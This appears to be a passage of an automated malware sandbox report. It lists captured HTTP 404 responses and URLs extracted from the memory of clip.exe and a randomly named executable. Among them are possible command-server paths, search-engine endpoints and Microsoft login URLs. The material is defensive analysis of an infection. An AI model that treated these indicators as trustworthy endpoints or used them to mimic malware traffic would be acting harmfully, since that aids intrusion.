            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:49 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:51 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 12 Jul 2024 22:07:54 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--matfrmn-jxa4m.se
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--matfrmn-jxa4m.se/4hda/
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
